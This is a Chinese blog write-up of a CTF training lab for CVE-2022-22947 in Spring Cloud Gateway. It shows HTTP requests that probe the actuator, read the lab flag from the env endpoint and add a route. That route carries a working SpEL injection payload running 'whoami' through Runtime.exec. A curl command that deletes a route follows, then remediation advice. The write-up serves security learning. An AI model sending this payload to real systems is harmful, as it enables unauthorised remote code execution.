春秋云镜:CVE-2022-22947

最新推荐文章于 2024-06-04 20:24:29 发布
最新推荐文章于 2024-06-04 20:24:29 发布
阅读量150 收藏
点赞数
分类专栏: 春秋靶场 文章标签: 网络 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43372364/article/details/134801870
版权

靶标介绍:

Spring Cloud Gateway 远程代码执行漏洞(CVE-2022-22947)发生在Spring Cloud Gateway应用程序的Actuator端点,其在启用、公开和不安全的情况下容易受到代码注入的攻击。攻击者可通过该漏洞恶意创建允许在远程主机上执行任意远程执行的请求。

分析:

Spring Cloud Gateway 是JAVA框架的一个路由设置,使用低版本未进行安全策略设置就会存在此问题

影响版本:

0x04 影响版本:
        3.1.x系列:Spring Cloud Gateway < 3.1.1

        3.0.x系列:Spring Cloud Gateway < 3.0.7

        其他旧的、不受支持的Spring Cloud Gateway版本
 

修改GET /actuator请求,确定actuator端口已经开启

GET  /actuator/ HTTP/1.1

GET  /actuator/ HTTP/1.1
Host: eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

HTTP/1.1 200 OK
Date: Tue, 05 Dec 2023 03:02:31 GMT
Content-Type: application/vnd.spring-boot.actuator.v3+json
Content-Length: 2675
Connection: close

{"_links":{"self":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator","templated":false},"beans":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator/beans","templated":false},"caches-cache":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator/caches/{cache}","templated":true},"caches":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator/caches","templated":false},"health-path":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator/health/{*path}","templated":true},"health":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator/health","templated":false},"info":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator/info","templated":false},"conditions":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator/conditions","templated":false},"configprops-prefix":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator/configprops/{prefix}","templated":true},"configprops":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator/configprops","templated":false},"env-toMatch":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator/env/{toMatch}","templated":true},"env":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator/env","templated":false},"loggers-name":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator/loggers/{name}","templated":true},"loggers":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator/loggers","templated":false},"heapdump":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator/heapdump","templated":false},"threaddump":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator/threaddump","templated":false},"metrics":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator/metrics","templated":false},"metrics-requiredMetricName":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator/metrics/{requiredMetricName}","templated":true},"scheduledtasks":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator/scheduledtasks","templated":false},"mappings":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator/mappings","templated":false},"refresh":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator/refresh","templated":false},"features":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator/features","templated":false},"gateway":{"href":"http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com/actuator/gateway","templated":false}}}

响应一些地址信息

地址栏访问该条信息

http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com:8080/actuator/env

 json串 JSON.propertySources[3].properties.ICQ_FLAG.value

可以查找flag "flag{998a1337-d197-4ed9-9c94-c9272fb1eb38}"

——————————————————结束—————————————— 

 添加路由 POST /actuator/gateway/routes/test1234 HTTP/1.1

POST /actuator/gateway/routes/test1234 HTTP/1.1
Host: eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/json
Content-Length: 337

{
  "id": "test1234",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}"
    }
  }],
  "uri": "http://example.com"
}

 刷新路由:POST /actuator/gateway/refresh HTTP/1.1

POST /actuator/gateway/refresh HTTP/1.1

 查看路由 GET /actuator/gateway/routes/test1234 HTTP/1.1

GET /actuator/gateway/routes/test1234 HTTP/1.1
Host: eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

 

 

如何进行利用道行太浅 仅仅可以任意删除路由

  curl -X DELETE http://eci-2ze1790muyii7mcirpig.cloudeci1.ichunqiu.com:8080/actuator/gateway/routes/test


 整改措施:

如果不需要Gateway actuator endpoint,可通过 management.endpoint.gateway.enabled: false 禁用它。

升级版本

  • Spring Cloud Gateway >= 3.1.1
  • Spring Cloud Gateway >= 3.0.7
白&黑
关注
专栏目录
春秋云境 CVE-2022-4230 夺旗
05-02
### 春秋云境 CVE-2022-4230 夺旗知识点解析 #### 一、漏洞概述 **CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件(版本13.2.9及以前)中的安全漏洞。该漏洞的主要原因是插件在处理特定参数时...
Spring Cloud Gateway 远程代码执行漏洞(CVE-2022-22947
热门推荐
xiaobai_20190815的博客
04-08 1万+
一、漏洞描述 Spring Cloud Gateway 是基于 Spring Framework 和 Spring Boot 构建的网关,它旨在为微服务架构提供一种简单、有效、统一的 API 路由管理方式。 3月1日,VMware发布安全公告,Spring Cloud Gateway中存在远程代码执行漏洞(CVE-2022-22947),该漏洞的CVSSv3评分为10.0。当启用或暴露不安全的 Gateway Actuator 端点时,使用 Spring Cloud Gateway 的应用程序容易受到代
CVE-2022-22947:Spring Cloud Gateway 远程代码执行漏洞复现及修复建议
yggcwhat
06-29 3318
CVE-2022-22947:Spring Cloud Gateway 远程代码执行漏洞复现及修复建议
CVE-2022-22947 Spring Cloud Gateway RCE漏洞复现分析
m0_61506558的博客
09-18 7761
Spring Cloud Gateway是基于Spring Framework和Spring Boot构建的API网关,它旨在为微服务架构提供一种简单、有效、统一的API路由管理方式。Spring官方博客发布了一篇关于Spring Cloud Gateway的CVE报告,据公告描述,当启用和暴露Gateway Actuator端点时,使用Spring Cloud Gateway的应用程序可受到代码注入攻击。攻击者可以发送特制的恶意请求,从而远程执行任意代码。(二)漏洞复现。
Spring Cloud Gateway RCE漏洞原理分析与复现(CVE-2022-22947
日常技术分享
10-16 5820
Spring Cloud Gateway RCE漏洞原理分析与复现(CVE-2022-22947
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC
08-10
CVE-2022-33891POC Apache Spark 命令注入(CVE-2022-33891)POC CVE-2022-33891 影响版本 Apache spark version 3.1.1版本 Apache Spark version>= 3.3.0 修复方案 1.建议升级到安全版本,参考官网链接: ...
CVE-2022-22947-Spring-Cloud-Gateway 内存马POC
03-29
Spring官方博客发布了一篇关于Spring Cloud Gateway的CVE报告,据公告描述,当启用和暴露 Gateway Actuator 端点时,使用 Spring Cloud Gateway 的应用程序可受到代码注入攻击。攻击者可以发送特制的恶意请求,从而...
sudo-1.9.12p1,解决cve-2022-43995
11-08
"sudo-1.9.12p1"是sudo的一个特定版本,该版本发布是为了修复一个重要的安全漏洞:CVE-2022-43995。 **sudo的基础知识** sudo的核心功能在于提供一种受控的权限提升机制,以增强系统的安全性。它通过sudoers文件来...
CVE-2022-22947(Spring-Cloud-Gateway)
Christ1na的博客
04-09 802
`SpringCloud Gateway` 是 Spring Cloud 的一个全新项目,该项目是基于 Spring 5.0,Spring Boot 2.0 和 Project Reactor 等技术开发的网关,它旨在为微服务架构提供一种简单有效的统一的 API 路由管理方式。
CVE-2022-22947
最新发布
weixin_74020633的博客
06-04 880
因为该漏洞是在使用Spring Colud Gateway的应用程序开启、暴露Gateway Actuator端点时,会容易造成代码注入攻击,攻击者可以制造恶意请求,在远程主机进行任意远程执行。至此我们利用这个CVE 通过添加查询路由的方式可以进行远程的命令执行,那么为什么能够利用呢,就涉及到java和函数方面,本人暂时没有学习java但是可以大致分享一下我学习到的。总结:这个漏洞是利用spEL表达式来包含命令,使得恶意的命令能被解析执行,在通过查询路由来回显信息,达到远程执行的目的。
CVE-2022-22947(SpringCloud Gateway)
一支花傲寒的博客
11-09 1960
SpringCloud Gateway远程执行漏洞
Spring Cloud Gateway远程代码执行漏洞复现(CVE-2022-22947)
HEAVEN569的博客
06-21 1623
Spring Cloud Gateway远程代码执行漏洞复现(CVE-2022-22947)
CVE-2022-22947:Spring Cloud Gateway RCE漏洞分析以及复现
qq_50808416的博客
05-15 2473
Spring Cloud Gateway是基于Spring Framework和Spring Boot构建的API网关,它旨在为微服务架构提供一种简单、有效、统一的API路由管理方式。Spring官方博客发布了一篇关于Spring Cloud Gateway的CVE报告,据公告描述,当启用和暴露Gateway Actuator端点时,使用Spring Cloud Gateway的应用程序可受到代码注入攻击。攻击者可以发送特制的恶意请求,从而远程执行任意代码。
CVE-2022-22947 Spring Cloud Gateway 远程代码执行漏洞复现
weixin_45260839的博客
05-08 3242
CVE-2022-22947 Spring Cloud Gateway 远程代码执行漏洞复现
CVE-2022-22947 SpringCloud Gateway 远程命令执行漏洞
dust_hk的博客
03-07 6547
CVE-2022-22947 SPRINGCLOUD GATEWAY SPEL RCE 摘要 Spring Cloud Gateway的商业产品是分布式API网关,用于路由HTTP请求并处理跨领域问题,如单点登录(SSO),速率限制,访问控制。借助Spring Cloud Gateway forKubernetes,运营商可以专注于管理和监控其目标环境中的API网关,而应用程序开发人员可以专注于API的公开方式,并应用适当的设计和跨领域问题。 在 3.1.1+ 和 3.0.7+ 之前的 spring clo
春秋云镜CVE-2022-0543
09-04
根据提供的引用内容,春秋云镜CVE-2022-0543指的是Apache Spark的命令注入漏洞(CVE-2022-33891)。这个漏洞影响的版本包括Apache Spark version 3.1.1和Apache Spark version >= 3.3.0。 官方建议升级到安全版本来...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值